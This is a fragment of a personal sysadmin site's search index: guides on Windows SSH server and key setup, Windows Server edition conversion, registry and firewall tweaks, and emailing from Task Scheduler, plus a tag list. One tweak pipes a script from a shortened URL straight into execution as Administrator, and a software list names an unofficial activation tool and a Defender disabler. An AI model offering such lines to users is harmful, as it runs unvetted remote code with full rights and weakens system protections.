", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#adding-ssh-keys", "title": "Adding SSH Keys", "text": "", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#administrator-user", "title": "Administrator User", "text": "Create the file: administrators_authorized_keys
at the following location:
C:\\ProgramData\\ssh\\administrators_authorized_keys\n
Edit the file and add your SSH public key to the file.
Now we need to set the correct permissions on the administrators_authorized_keys file so the Windows SSH server will accept it. We can do this by using the following command:
icacls.exe \"C:\\ProgramData\\ssh\\administrators_authorized_keys\" /inheritance:r /grant \"Administrators:F\" /grant \"SYSTEM:F\"\n
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect to the Windows server with your SSH key
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#regular-user-non-administrator", "title": "Regular User (non-administrator)", "text": "Create a .ssh
directory in the home directory of the user.
C:\\Users\\<username>\\.ssh\\\n
Create the file: authorized_keys
at the following location:
C:\\Users\\<username>\\.ssh\\authorized_keys\n
Edit the file and add your SSH public key to the file.
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect with non-administrator user to the Windows server with your SSH key
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/ssh-server/#powershell-as-default-shell-for-ssh", "title": "PowerShell
as Default Shell for SSH", "text": "By default the SSH client uses the Windows command prompt as the default shell.
We can change the default shell to PowerShell by running the following PowerShell command:
New-ItemProperty -Path \"HKLM:\\SOFTWARE\\OpenSSH\" -Name DefaultShell -Value \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -PropertyType String -Force\n
The next time you connect to the Windows SSH server it should start the PowerShell shell.
It should look something like this:
", "tags": ["windows", "ssh-server", "powershell", "rsa-keys"]}, {"location": "windows/useful-software/", "title": "Useful Software", "text": "", "tags": ["utilities", "windows"]}, {"location": "windows/useful-software/#win-10-iso-official-download", "title": "Win 10 ISO Official Download", "text": "Microsoft Official Windows 10 Download
", "tags": ["utilities", "windows"]}, {"location": "windows/useful-software/#list-of-useful-software", "title": "List of Useful Software", "text": "Application Description MAS Windows & Office Activation Windows Tweaker 4 for Windows 10 Windows Tweaker Defender Control Windows Defender control Link Shell Extension Symlinks For Windows Winaero Tweaker Winaero Tweaker Autologon Autologon at boot", "tags": ["utilities", "windows"]}, {"location": "windows/windows-servers/", "title": "Windows Servers", "text": "", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#basic-setup", "title": "Basic Setup", "text": "At Server Manager click Configure this local server
Computer name - rename the server's name Remote Desktop - allow RDP Ethernet instance - disable IPV6 Feedback & Diagnostics - set Feedback frequency
to Never
IE Enhanced Security Configuration - Off Time zone - set the current timezone, At Internet Time
tab change time.windows.com
to time.nist.gov
Open gpedit.msc with Run
Local Computer Policy -> Administrative Templates -> System -> Display Shutdown Even Tracker - Disable Local Computer Policy -> Windows Settings -> Security Settings -> Local Policies -> Security Options ->Interactive logon: Do not require CTRL+ALT+DEL - Enable ", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#convert-evaluation-copy-to-full-version", "title": "Convert Evaluation Copy to Full Version", "text": "When using the Evaluation version of Windows Server, the desktop displays the current build and the time until the end of the grace period (Windows License valid for 180 days).
", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#windows-server-2022", "title": "Windows Server 2022", "text": "Run from Powershell:
Windows Server 2022 Standard
dism /online /set-edition:serverstandard /productkey:VDYBN-27WPP-V4HQT-9VMD4-VMK7H /accepteula\n
Windows Server 2022 Datacenter:
dism /online /set-edition:serverdatacenter /productkey:WX4NM-KYWYW-QJJR4-XV3QB-6VM33 /accepteula\n
", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-servers/#windows-server-2019", "title": "Windows Server 2019", "text": "Run from Powershell:
Windows Server 2019 Standard
dism /online /set-edition:ServerStandard /productkey:N69G4-B89J2-4G8F4-WWYCC-J464C /accepteula\n
Windows Server 2019 Datacenter:
dism /online /set-edition:ServerDatacenter /productkey:WMDGN-G9PQG-XVVXX-R3X43-63DFG /accepteula\n
", "tags": ["utilities", "windows", "servers"]}, {"location": "windows/windows-ssh-agent-with-keys/", "title": "Windows SSH Client with ed25519 Keys for Secure Connections", "text": "In the modern digital age, ensuring the security of your connections is critical. This guide will walk you through the steps to configure the SSH client and SSH agent on Windows using ed25519 keys, allowing for secure connections to services like Git and remote servers.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#introduction-to-ssh-and-ed25519-keys", "title": "Introduction to SSH and ed25519 Keys", "text": "SSH, or Secure Shell, is a cryptographic network protocol for secure communication over an unsecured network. It is particularly used for secure logins, file transfers, and command-line operations.
ed25519 is a public-key signature system that is renowned for high security with relatively short key lengths. This makes it faster and more efficient compared to older algorithms such as RSA.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#openssh-client-installation", "title": "OpenSSH Client Installation", "text": "To utilize SSH, you need to ensure that the OpenSSH client is installed on your Windows system.
Note
The steps below should be performed in PowerShell with Administrator privileges.
Check if OpenSSH Client is available by running the following cmdlet: Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'\n
If OpenSSH Client is not installed, the output will be:
Name: OpenSSH.Client~~~~0.0.1.0\nState: NotPresent\n
If it's not present, proceed to the next step to install it.
Install the OpenSSH Client by running the following command: # Install the OpenSSH Client\nAdd-WindowsCapability -Online -Name OpenSSH.Client~~~~0.0.1.0\n
The command should return:
Path:\nOnline: True\nRestartNeeded: False\n
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#setting-up-ssh-agent-in-windows", "title": "Setting Up SSH Agent in Windows", "text": "The SSH Agent is a background service that stores your keys. When connecting to a remote host using SSH, the agent can automatically provide the key.
Note
The steps below should be performed in PowerShell with Administrator privileges.
Set SSH Agent to start automatically at boot: Set-Service -Name ssh-agent -StartupType 'Automatic'\n
Start the SSH Agent service: Start-Service -Name ssh-agent\n
Test the SSH Agent Is Running: Get-Service -Name ssh-agent\n
The output should be:
Status Name DisplayName\n------ ---- -----------\nRunning ssh-agent OpenSSH Authentication Agent\n
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#generating-and-adding-ed25519-ssh-keys", "title": "Generating and Adding ed25519 SSH Keys", "text": "Note
The steps below should be performed in PowerShell with regular user privileges.
Generate ed25519 SSH keys: ssh-keygen -t ed25519 -C \"your_email@example.com\"\n
This command generates an ed25519 key pair. The default location for the keys is C:\\Users\\<YourUsername>\\.ssh
. The private key is named id_ed25519
and the public key is named id_ed25519.pub
.
Adding the ed25519 SSH Key to the SSH Agent: ssh-add $env:USERPROFILE\\.ssh\\id_ed25519\n
If your keys are stored in a different location or have a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\\path\\to\\your\\private-key-file\n
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#importing-existing-ed25519-ssh-keys-optional", "title": "Importing Existing ed25519 SSH Keys (Optional)", "text": "If you already have an existing pair of ed25519 SSH keys that you would like to use, you can import them into your SSH Agent.
Note
The steps below should be performed in PowerShell with regular user privileges.
Copy your existing private key to the default SSH folder. The default folder for SSH keys is typically C:\\Users\\<YourUsername>\\.ssh
. Make sure the private key file you are copying is named id_ed25519
.
Add the existing ed25519 SSH Key to the SSH Agent:
ssh-add $env:USERPROFILE\\.ssh\\id_ed25519\n
Note: If your private key file is located in a different path or has a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\\path\\to\\your\\private-key-file\n
Copy your existing public key to the servers or services you want to connect to. This typically involves appending the contents of your public key file to the ~/.ssh/authorized_keys
file on the server. ", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#step-5-using-ssh-with-ed25519-keys-for-secure-connections", "title": "Step 5: Using SSH with ed25519 Keys for Secure Connections", "text": "Now that you have your ed25519 SSH keys generated or imported, and added to the SSH Agent, you can use SSH to connect to remote servers or services like Git securely.
For example, to connect to a remote server:
ssh username@remote_host\n
Using SSH keys will also allow you to interact with Git repositories securely, which is especially helpful when dealing with private repositories or pushing code changes.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-ssh-agent-with-keys/#wrapping-up", "title": "Wrapping Up", "text": "By following this guide, you have configured the SSH client and SSH agent on your Windows system using ed25519 keys. This configuration ensures secure communication with services like Git and remote servers, safeguarding the integrity and security of your data.
", "tags": ["SSH", "Windows", "ed25519", "OpenSSH", "Git", "Security"]}, {"location": "windows/windows-tweaks/", "title": "Windwos 10/11 Tweeks", "text": "Some tips and tricks and Tweeks for Windows 10/11 that may be helpful or even essential for you
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#deblot-windwos-1011-powershell-script", "title": "Deblot Windwos 10/11 Powershell Script", "text": "Source: Windows10Debloater Github Page
Run as Administrator:
iwr -useb https://git.io/debloat|iex\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#enable-the-legacy-context-menu-in-windows-11", "title": "Enable the Legacy Context Menu in Windows 11", "text": "To enable the context menu that appeared in Windows 10 and earlier, you can use the following PowerShell snippet.
New-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\\InprocServer32\" -Value \"\" -Force\n
You may need to log out and log back in or restart\u00a0explorer.exe
.
Get-Process explorer | Stop-Process\n
The context menu will now look like this:
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#allow-icmp-ping-in-windows-firewall", "title": "Allow ICMP (Ping) in Windows Firewall", "text": "The following commands will allow ICMP (Ping) in Windows Firewall. Use Powershell as Administrator to run the following commands.
For IPv4:
netsh advfirewall firewall add rule name=\"ICMP Allow incoming V4 echo request\" protocol=\"icmpv4:8,any\" dir=in action=allow\n
For IPv6:
netsh advfirewall firewall add rule name=\"ICMP Allow incoming V6 echo request\" protocol=\"icmpv6:8,any\" dir=in action=allow\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#activate-administrator-user", "title": "Activate Administrator User", "text": "Hit the Windows Key + R and type
lusrmgr.msc\n
Edit Administrator, uncheck 'Account is disabled', and click OK.
Right Click on Administrator and click Set Password
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#lunch-network-connections", "title": "Lunch \"Network Connections\"", "text": "Hit the Windows Key + R and type
ncpa.cpl\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#add-program-to-startup-windows-7810-servers", "title": "Add Program to Startup - Windows 7,8,10 & Servers", "text": "Hit WIN+R or from start menu search run
and press enter. At run dialog enter shell:common startup
:
Create shortcut for the program you want to auto startup when Windows boots. Move the shortcut to the Startup
folder that opened before. ", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/windows-tweaks/#reboot-or-shutdown-windows-from-command-line-cmd", "title": "Reboot or Shutdown Windows From Command Line (CMD)", "text": "Reboot windows computer This command will set a time out of 10 seconds to close the applications. After 10 seconds, windows reboot will start.
shutdown /r /t 10\n
Force reboot
shutdown /r /f /t 0\n
Force Shutdown
shutdown /s /f /t 0\n
", "tags": ["Windwos", "Tweeks"]}, {"location": "windows/guides/declare-locations/", "title": "Declare Locations as \"Inside Your Local Network\"", "text": "Warning
The Intranet Zone is the most trusted and least protected zone. DO NOT put any subnets or IP addresses in this zone unless they are TOTALLY under YOUR control. That includes ANY public server, web site, subnet, or IP address.
Select 'Control Panel'/'Internet Properties'/'Security' tab. (Alternatively, open Internet Explorer and select 'Tools'/'Internet Options'/'Security' tab.)
Highlight 'Local Intranet' and click 'Sites'.
Set the following: Uncheck 'Automatically detect intranet network'.Check 'Include all local (intranet) sites not listed in other zones'.Uncheck 'Include all sites that bypass the proxy server'.Check 'Include all network paths (UNCs)'.\u200b
Click 'Advanced'
Uncheck 'Require server verification (https:) for all sites in this zone'.
In the field labeled 'Add this web site to the zone:', add your local, private subnet using an asterisk for a network mask and click 'Add'. E.g. If your home (local) network is 192.168.25.0 with a mask of 255.255.255.0, enter '192.168.25.*' (without the quotes).
Note
Entries can be:\u200b
* Individual IP addresses (e.g. '192.168.5.25', etc.),\n* Class C subnets (e.g. '192.168.27.*'),\n* Class B subnets (e.g. '172.16.*.*'), or\n* Class A subnets (e.g. '10.*.*.*')\u200b\n
You can add as many addresses as you need to the list. It can be handy to add the address of a VPN subnet to the list if it is also private and you TOTALLY trust it.\u200b
Close out with 'Close'/'OK'/'OK' and close the Control Panel (or Internet Explorer). ", "tags": ["utilities", "network", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/", "title": "Send Emails From The Windows Task Scheduler", "text": "First, download SendEmail, a free (and open source) tool for sending emails from the command line. Extract the downloaded archive into a folder on your computer.
Next, launch the Windows Task Scheduler and create a new task \u2013 consult our guide to creating scheduled tasks for more information. You can create a task that automatically sends an email at a specific time or a task that sends an email in response to a specific event.
When you reach the Action window, select Start a program instead of Send an e-mail.
In the Program/script box, use the Browse button and navigate to the SendEmail.exe file on your computer.
Finally, you\u2019ll have to add the arguments required to authenticate with your SMTP server and construct your email. Here\u2019s a list of the options you can use with SendEmail:
", "tags": ["utilities", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/#server-options", "title": "Server Options", "text": " -f EMAIL \u2013 The email address you\u2019re sending from. -s SERVER:PORT \u2013 The SMTP server and port it requires. -xu USERNAME \u2013 The username you need to authenticate with the SMTP server. -xp PASSWORD \u2013 The password you need to authenticate with the SMTP server. -o tls=yes \u2013 Enables TLS encryption. May be necessary for some SMTP servers. If you\u2019re using Gmail\u2019s SMTP servers, these are the server options you\u2019ll need:
-s smtp.gmail.com:587 -xu you@gmail.com -xp password -o tls=yes Of course, you\u2019ll have to enter your own email address and password here.
", "tags": ["utilities", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/#destination-options", "title": "Destination Options", "text": " -t EMAIL \u2013 The destination email address. You can send an email to multiple addresses by including a space between each address after the -t option. -cc EMAIL \u2013 Any addresses you\u2019d like to CC on the email. You can specify multiple addresses by placing a space between each email address, just as with the -t command above. -bcc EMAIL \u2013 The BCC version of the CC option above. ", "tags": ["utilities", "windows"]}, {"location": "windows/guides/email-from-task-scheduler/#email-options", "title": "Email Options", "text": " -u SUBJECT \u2013 The subject of your email -m BODY \u2013 The message body text of your email. -a ATTACHMENT \u2013 The path of a file you\u2019d like to attach. This is optional. For example, let\u2019s say your email address is example@gmail.com and you\u2019d like to send an email to person@example.com
. You\u2019d use the following options:
-f example@gmail.com -t person@example.com -u Subject -m This is the body text! -s smtp.gmail.com:587 -xu example@gmail.com -xp password -o tls=yes\n
Once you\u2019ve put together your options, copy and paste them into the Add arguments box.
Save your task and you\u2019re done. Your task will automatically send email on the schedule (or in response to the event) you specified.
", "tags": ["utilities", "windows"]}, {"location": "tags/", "title": "Tags and Categories", "text": ""}, {"location": "tags/#3g-modem", "title": "3g-modem", "text": " 3g Modem Host Configuration "}, {"location": "tags/#cookies", "title": "Cookies", "text": ""}, {"location": "tags/#git", "title": "Git", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#homelab", "title": "HomeLab", "text": ""}, {"location": "tags/#iid", "title": "IID", "text": " IID Generator & Validator "}, {"location": "tags/#nas", "title": "NAS", "text": " Synology NAS Free 80,443 Ports "}, {"location": "tags/#openssh", "title": "OpenSSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#proxmox", "title": "Proxmox", "text": ""}, {"location": "tags/#ssh", "title": "SSH", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#security", "title": "Security", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#synology", "title": "Synology", "text": ""}, {"location": "tags/#tweeks", "title": "Tweeks", "text": ""}, {"location": "tags/#ubuntu", "title": "Ubuntu", "text": ""}, {"location": "tags/#virtio", "title": "VirtIO", "text": ""}, {"location": "tags/#windows", "title": "Windows", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#windows-virtual-machines", "title": "Windows Virtual Machines", "text": ""}, {"location": "tags/#windwos", "title": "Windwos", "text": ""}, {"location": "tags/#adb", "title": "adb", "text": ""}, {"location": "tags/#admonition", "title": "admonition", "text": ""}, {"location": "tags/#affiliate", "title": "affiliate", "text": ""}, {"location": "tags/#android", "title": "android", "text": " ADB Cheat Sheet Apktool PT Application JADX Decompiler MobSF SSL Pinning Bypass "}, {"location": "tags/#apktool", "title": "apktool", "text": ""}, {"location": "tags/#application", "title": "application", "text": ""}, {"location": "tags/#autofs", "title": "autofs", "text": ""}, {"location": "tags/#automation", "title": 
"automation", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Syncthing Motion Sensor Display Control "}, {"location": "tags/#bash", "title": "bash", "text": " DDNS Cloudflare Bash BrewUp "}, {"location": "tags/#cheat-sheet", "title": "cheat-sheet", "text": " ADB Cheat Sheet Npm Command-line Utility PM2 - Node.js Process Manager Pip Package Manager Supervisor Process Manager Virtual Environment Ruby Gem Package Manager Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli "}, {"location": "tags/#cheatsheet", "title": "cheatsheet", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet "}, {"location": "tags/#chrome", "title": "chrome", "text": ""}, {"location": "tags/#cli", "title": "cli", "text": ""}, {"location": "tags/#clickjacking", "title": "clickjacking", "text": ""}, {"location": "tags/#cloudflare", "title": "cloudflare", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell Pi-hole Cloudflare DNS Sync Let's Encrypt with Cloudflare UDM Cloudflare DDNS "}, {"location": "tags/#code-blocks", "title": "code-blocks", "text": ""}, {"location": "tags/#collation", "title": "collation", "text": ""}, {"location": "tags/#commands", "title": "commands", "text": ""}, {"location": "tags/#container", "title": "container", "text": ""}, {"location": "tags/#content-tabs", "title": "content-tabs", "text": ""}, {"location": "tags/#ddns", "title": "ddns", "text": " DDNS Cloudflare Bash DDNS Cloudflare PowerShell "}, {"location": "tags/#debian", "title": "debian", "text": ""}, {"location": "tags/#decompiler", "title": "decompiler", "text": ""}, {"location": "tags/#diagram", "title": "diagram", "text": ""}, {"location": "tags/#dns", "title": "dns", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Free Port 53 on Ubuntu "}, {"location": "tags/#dns-over-https", "title": "dns-over-https", "text": " Pi-hole with 
DOH on Docker "}, {"location": "tags/#docker", "title": "docker", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker Common Docker Commands Containers Cheat Sheet Images Cheat Sheet Docker Installation Networks & Links Cheat Sheet Security & Best Practices Watchtower Docker on Raspberry Pi "}, {"location": "tags/#docker-compose", "title": "docker-compose", "text": ""}, {"location": "tags/#doh", "title": "doh", "text": " Pi-hole with DOH on Docker "}, {"location": "tags/#dsm", "title": "dsm", "text": ""}, {"location": "tags/#ed25519", "title": "ed25519", "text": " Windows SSH with ed25519 Keys "}, {"location": "tags/#edgerouter", "title": "edgerouter", "text": ""}, {"location": "tags/#emojis", "title": "emojis", "text": ""}, {"location": "tags/#endorsements", "title": "endorsements", "text": ""}, {"location": "tags/#extensions", "title": "extensions", "text": " Chrome Extensions Firefox Extensions "}, {"location": "tags/#external-markdown", "title": "external-markdown", "text": ""}, {"location": "tags/#files-handling", "title": "files-handling", "text": ""}, {"location": "tags/#firefox", "title": "firefox", "text": ""}, {"location": "tags/#frida", "title": "frida", "text": ""}, {"location": "tags/#gem", "title": "gem", "text": ""}, {"location": "tags/#git_1", "title": "git", "text": " Git Cli Cheat Sheet GitHub Cli "}, {"location": "tags/#github", "title": "github", "text": " Removing Sensitive Data Git Cli Cheat Sheet Submodules Cheat Sheet GitHub Cli BrewUp "}, {"location": "tags/#gpu", "title": "gpu", "text": ""}, {"location": "tags/#headings", "title": "headings", "text": ""}, {"location": "tags/#history", "title": "history", "text": ""}, {"location": "tags/#homebrew", "title": "homebrew", "text": ""}, {"location": "tags/#horizontal-line", "title": "horizontal-line", "text": ""}, {"location": "tags/#htpasswd", "title": "htpasswd", "text": " htpasswd Password Generator "}, {"location": "tags/#iterm2", "title": "iTerm2", "text": ""}, {"location": 
"tags/#icons", "title": "icons", "text": ""}, {"location": "tags/#igpu", "title": "igpu", "text": " iGPU Passthrough to VM iGPU Split Passthrough "}, {"location": "tags/#images", "title": "images", "text": ""}, {"location": "tags/#information", "title": "information", "text": " Affiliate Disclosure Cookies Policy Website Endorsements MIT License Privacy Policy "}, {"location": "tags/#ipv6", "title": "ipv6", "text": " Disable IPv6 on Proxmox Disable IPv6 via Grub "}, {"location": "tags/#java", "title": "java", "text": ""}, {"location": "tags/#kali", "title": "kali", "text": ""}, {"location": "tags/#kali-linux", "title": "kali-linux", "text": ""}, {"location": "tags/#letsencrypt", "title": "letsencrypt", "text": " Let's Encrypt with Cloudflare "}, {"location": "tags/#license", "title": "license", "text": ""}, {"location": "tags/#links", "title": "links", "text": ""}, {"location": "tags/#linux", "title": "linux", "text": " Syncthing Better Terminal Experience Files Handling General Snippets Locales & Timezone LVM Partitions Memory & Swap SSH Hardening with SSH Keys Identify Network Interfaces "}, {"location": "tags/#lists", "title": "lists", "text": ""}, {"location": "tags/#locales", "title": "locales", "text": ""}, {"location": "tags/#lvm", "title": "lvm", "text": ""}, {"location": "tags/#macos", "title": "macOS", "text": " Applications Tweaks Enable Root User TouchID for sudo UI Tweaks Brew Snippets "}, {"location": "tags/#maco", "title": "maco", "text": " Pyenv-virtualenv Multi Version "}, {"location": "tags/#macos_1", "title": "macos", "text": " Syncthing Better Terminal Experience SSH Passphrase to Keychain Terminal Snippets BrewUp "}, {"location": "tags/#magic-mirror", "title": "magic-mirror", "text": ""}, {"location": "tags/#magicmirror", "title": "magicmirror", "text": ""}, {"location": "tags/#markdown", "title": "markdown", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages Plugin "}, {"location": "tags/#markdown-cheatsheet", "title": 
"markdown-cheatsheet", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#mermaid", "title": "mermaid", "text": ""}, {"location": "tags/#metasploit", "title": "metasploit", "text": ""}, {"location": "tags/#mkdocs", "title": "mkdocs", "text": " About Markdown Admonitions Basic Formatting Code Blocks Content Tabs Diagrams Embed External Markdown Icons & Emojis Images Links Tables, Lists and Quotes "}, {"location": "tags/#motion-sensor", "title": "motion-sensor", "text": " Motion Sensor Display Control "}, {"location": "tags/#mount", "title": "mount", "text": ""}, {"location": "tags/#network", "title": "network", "text": " Proxmox Networking Identify Network Interfaces Declare Locations as \"Inside Your Local Network\" "}, {"location": "tags/#node", "title": "node", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#npm", "title": "npm", "text": " Npm Command-line Utility PM2 - Node.js Process Manager "}, {"location": "tags/#oh-my-zsh", "title": "oh-my-zsh", "text": " Better Terminal Experience oh-my-zsh on Synology NAS "}, {"location": "tags/#package-manager", "title": "package-manager", "text": " Pip Package Manager Ruby Gem Package Manager "}, {"location": "tags/#passthrough", "title": "passthrough", "text": " GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough "}, {"location": "tags/#penetration-testing", "title": "penetration-testing", "text": " Apktool PT Application MobSF Cli Commands Collation Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Kali Linux "}, {"location": "tags/#pi-hole", "title": "pi-hole", "text": " Pi-hole Cloudflare DNS Sync Pi-hole with DOH on Docker "}, {"location": "tags/#pip", "title": "pip", "text": ""}, {"location": "tags/#pm2", "title": "pm2", "text": " PM2 - Node.js Process Manager "}, 
{"location": "tags/#portfolio", "title": "portfolio", "text": ""}, {"location": "tags/#ports", "title": "ports", "text": ""}, {"location": "tags/#powershell", "title": "powershell", "text": " DDNS Cloudflare PowerShell Windows SSH Server "}, {"location": "tags/#privacy-policy", "title": "privacy policy", "text": ""}, {"location": "tags/#process-manager", "title": "process-manager", "text": " PM2 - Node.js Process Manager "}, {"location": "tags/#processes-manager", "title": "processes-manager", "text": " Supervisor Process Manager "}, {"location": "tags/#proxmox_1", "title": "proxmox", "text": " Cloud Image Template Let's Encrypt with Cloudflare PVE Kernel Cleaner VM Disk Expander GPU Passthrough to VM iGPU Passthrough to VM iGPU Split Passthrough vGPU Split Passthrough Disable IPv6 on Proxmox Proxmox Networking "}, {"location": "tags/#pt", "title": "pt", "text": " Cli Commands Collation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#python", "title": "python", "text": " Pip Package Manager Supervisor Process Manager Virtual Environment Pyenv-virtualenv Multi Version "}, {"location": "tags/#quotes", "title": "quotes", "text": ""}, {"location": "tags/#raspberry-pi", "title": "raspberry-pi", "text": " Docker on Raspberry Pi External Power Button Motion Sensor Display Control Snippets 3g Modem Host Configuration Magic Mirror 2.0 Magic Mirror "}, {"location": "tags/#resume", "title": "resume", "text": ""}, {"location": "tags/#reverse-engineering", "title": "reverse-engineering", "text": ""}, {"location": "tags/#rfid", "title": "rfid", "text": " About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A "}, {"location": "tags/#rsa", "title": "rsa", "text": " SSH Hardening with SSH Keys "}, {"location": "tags/#rsa-keys", "title": "rsa-keys", "text": " SSH With RSA Keys Windows SSH Server "}, {"location": "tags/#ruby", "title": 
"ruby", "text": ""}, {"location": "tags/#security_1", "title": "security", "text": ""}, {"location": "tags/#servers", "title": "servers", "text": ""}, {"location": "tags/#share", "title": "share", "text": ""}, {"location": "tags/#smb", "title": "smb", "text": ""}, {"location": "tags/#snippets", "title": "snippets", "text": ""}, {"location": "tags/#ssh_1", "title": "ssh", "text": " Enable SSH Root Login SSH With RSA Keys SSH Hardening with SSH Keys "}, {"location": "tags/#ssh-server", "title": "ssh-server", "text": ""}, {"location": "tags/#ssl-pinning", "title": "ssl-pinning", "text": ""}, {"location": "tags/#submodules", "title": "submodules", "text": ""}, {"location": "tags/#supervisor", "title": "supervisor", "text": " Supervisor Process Manager "}, {"location": "tags/#syncthing", "title": "syncthing", "text": ""}, {"location": "tags/#synology_1", "title": "synology", "text": " Syncthing oh-my-zsh on Synology NAS Install VM Tools on Virtual Machine Auto DSM Config Backup Free 80,443 Ports Enable SSH Root Login SSH With RSA Keys "}, {"location": "tags/#tables", "title": "tables", "text": ""}, {"location": "tags/#template", "title": "template", "text": " Disable IPV6 oh-my-zsh Install Snippets Awesome Pages Plugin "}, {"location": "tags/#terminal", "title": "terminal", "text": " Better Terminal Experience TouchID for sudo "}, {"location": "tags/#text-highlighting", "title": "text-highlighting", "text": ""}, {"location": "tags/#timezone", "title": "timezone", "text": ""}, {"location": "tags/#tools", "title": "tools", "text": " Gobuster CheatSheet Nmap CheatSheet XSS CheatSheet Bettercap 1.6.2 Installation Links and Tools Metasploit Framework Wifite About Proxmark3 Proxmark3 CheatSheet Mifare Classic 1K ISO14443A Clickjacking Test Page IID Generator & Validator "}, {"location": "tags/#touchid", "title": "touchID", "text": ""}, {"location": "tags/#ubiquiti", "title": "ubiquiti", "text": " EdgeRouter CLI Commands Failover Telegram Notifications Persistent Boot Script 
Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#ubuntu_1", "title": "ubuntu", "text": " Disable IPv6 via Grub Remove Snap Store Unattended Upgrades "}, {"location": "tags/#udm", "title": "udm", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#unifi", "title": "unifi", "text": " CLI Commands Failover Telegram Notifications Persistent Boot Script Persistent SSH Keys Better Fan Speeds UDM Cloudflare DDNS Wireguard VPN "}, {"location": "tags/#utilities", "title": "utilities", "text": " Useful Links & Tools Wifi QR Image Generator Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#venv", "title": "venv", "text": ""}, {"location": "tags/#vgpu", "title": "vgpu", "text": ""}, {"location": "tags/#virtualization", "title": "virtualization", "text": " Cloud Image Template VM Disk Expander "}, {"location": "tags/#vmware", "title": "vmware", "text": ""}, {"location": "tags/#vmware-fusion", "title": "vmware-fusion", "text": ""}, {"location": "tags/#watchtower", "title": "watchtower", "text": ""}, {"location": "tags/#wifi", "title": "wifi", "text": ""}, {"location": "tags/#windows_1", "title": "windows", "text": " Syncthing Windows SSH Server Useful Software Windows Servers Declare Locations as \"Inside Your Local Network\" Send Emails From The Windows Task Scheduler "}, {"location": "tags/#wireguard", "title": "wireguard", "text": ""}, {"location": "tags/#zsh", "title": "zsh", "text": " Better Terminal Experience "}]}
\ No newline at end of file
diff --git a/sitemap.xml b/sitemap.xml
new file mode 100644
index 000000000..d96b03938
--- /dev/null
+++ b/sitemap.xml
@@ -0,0 +1,688 @@
+
+
+
+ https://3os.org/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/blog/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/tags/
+ 2023-11-26
+ daily
+
+
